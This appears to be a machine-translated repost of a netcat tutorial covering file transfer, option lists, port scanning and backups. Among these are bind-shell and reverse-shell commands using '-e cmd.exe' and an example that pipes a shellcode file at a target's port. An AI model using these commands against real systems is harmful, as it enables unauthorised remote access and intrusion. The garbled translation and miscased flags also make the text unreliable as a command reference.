"Share" the use of NC under Linux

Source: Internet
Author: User
Tags set time domain name server

Today, strolling around the drink from, I saw a post about LinuxThe next NC Life to implement file transfer, LearningLearned a bit.
Send side:
Cat Test. txt | Nc-l-P 6666
Or Nc-l-P 6666 < test.txtSome versions are not available on-p
"Listening on port 6666, Waiting for Connection" (set the Send side IP to 10.20.133.152)
Receiving end:
NC 10.20.133.152 6666 > Test1.txt
As above, you can transfer the file Test.txt from the sender to the receiving end, save as Test1.txt

Want to connect to somewhere: NC [-options] hostname port[s] [ports] ...
Bind port Waiting for connection: Nc-l-P Port [-options] [hostname] [port]

Syntax: NC [-hlnruz][-g< Gateway ...>][-g< number of points >][-i< delay seconds >][-o< output file >][-p< communication port >][-s< Source Address >][-v ...] [-w< timeout number of seconds;] [Host name] [Communication port ...]
Additional note: The implementation of this directive can set the parameters of the router.
Parameters
-g< Gateway > Set Router Hop communication gateway, the most lost oh can be set to 8.
-g< number of pointers > set source route-to-point, with a number of multiples of 4.
-H online Help.
-i< delay seconds > Set time interval for transmitting information and scanning communication ports.
-L Use the monitor mode to control incoming data.
-N uses the IP address directly, not through the domain name server.
-o< output File > Specify the name of the file, and transfer the data transferred to the file in 16 Loadline to save.
-p< Communication port > Set the communication port used by the local host.
-R chaos Specifies the communication port between the local and the remote host.
-s< Source location > Set the IP address of the local host to send the packet.
-U uses the UDP transport protocol.
-V Displays the instruction execution process.
-w< Timeout seconds > Set the time to wait for the connection.
-Z uses 0 in/out mode and is only used when scanning communication ports.

In addition, NC commands are also available for port scanning:
Nc-v-z-w2 10.20.133.152 1-14000
The 1~14000 TCP port on the 10.20.133.152 host can be scanned;

Nc-u-v-z-w2 10.20.133.152 1-14000
You can scan the 1~14000 UDP port on the 10.20.133.152 host.

NC is a very good network detection tool, the following is the detailed use.
' Nc.exe-h ' can see how each parameter is used.
Basic format: NC [-options] hostname port [ports] ...
Nc-l-P port [options] [hostname] [port]
-D Background mode
-e Prog program redirection, once connected, execute [Dangerous!!]
-G Gateway source-routing Hop Point, up to 8
-G num source-routing pointer:4, 8, 12, ...
-H Help Information
-I secs delay interval
-L listening mode for inbound connections
-L continues to listen after the connection is closed
-n Specifies the IP address of the number and cannot be used hostname
-O file record 16-binary transfer
-P port Local port number
-R random Local and remote ports
-S addr Local Source Address
-T using telnet interactive mode
-U UDP mode
-V Verbose output--with two-V for more detailed content
-W secs timeout time
-Z turns the input and output off-for scanning
The representation of a port can be written as a range format for m-n.
1) Connect to the remote host
Format: NC-NVV 192.168.x.x 80
Explanation: Connecting to the TCP80 port of 192.168.x.x
2) Listen to the local host
Format: nc-l-P 80
Explanation: Listen to the TCP80 port of this machine
3) Scan remote host
Format: nc-nvv-w2-z 192.168.x.x 80-445
Explanation: Scan all ports of 192.168.x.x TCP80 to TCP445
4) remote host binding shell, example:
Format: nc-l-P 5354-t-e C:\winnt\system32\cmd.exe
Explanation: The Cmdshell of the remote host is bound to the TCP5354 port of the remote host
5) remote host bind shell and reverse connection, example:
Format: NC-T-e c:\winnt\system32\cmd.exe 192.168.x.x 5354
Explanation: Bind the remote host's Cmdshell and reverse connect to the 192.168.x.x TCP5354 port
These are some of the most basic uses (in fact, there are a lot of NC usage,
When the Mate Pipeline command "|" With the redirect command "<", ">" and so on command function more powerful ... )。
6) for attack applications, examples:
Format 1:type.exe C:\EXPLOIT.TXT|NC-NVV 192.168.x.x 80
Format 2:NC-NVV 192.168.x.x < C:\exploit.txt
Explanation: Connect to the 192.168.x.x 80 port and send the ' c:\exploit.txt ' content in its pipeline (two formats do have the same effect, which is similar: P)
Attached: ' C:\exploit.txt ' for shellcode, etc.
7) for honeypot use [1], Example:
Format: nc-l-P 80
Explanation: Use '-l ' (note L is uppercase) to continuously listen to a port until CTRL + C
8) for honeypot use [2], example:
Format: nc-l-p > C:\log.txt
Explanation: Use '-l ' can continuously listen to a port, until CTRL + C, and output the results to ' c:\log.txt ', if the ' > '
Change to ' >> ' to append log
Attached: ' C:\log.txt ' for logs, etc.
9) for honeypot use [3], Example:
Format 1:nc-l-P < C:\honeypot.txt
Format 2:type.exe c:\honeypot.txt|nc-l-P 80
Explanation: Use '-l ' can keep listening to a port until Ctrl + C, and ' send ' the contents of ' C:\honeypot.txt ' into its pipeline!
10) Backup Archive
The folder of a machine/data backup to the backup.tgz of Host B
SOURCE Host: Tar czf-work|nc-l-c-p 1234
Destination Host: NC 192.168.0.1 1234 >a.tgz
Or
A:TAR-ZCF data|nc-l-P 4444
B:NC a 4444 >backup.tgz
After the pass CTRL + C interrupt connection, so that a host will not generate files directly to the backup.tgz, the disadvantage is not know when to pass, hey

"Share" the use of NC under Linux

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.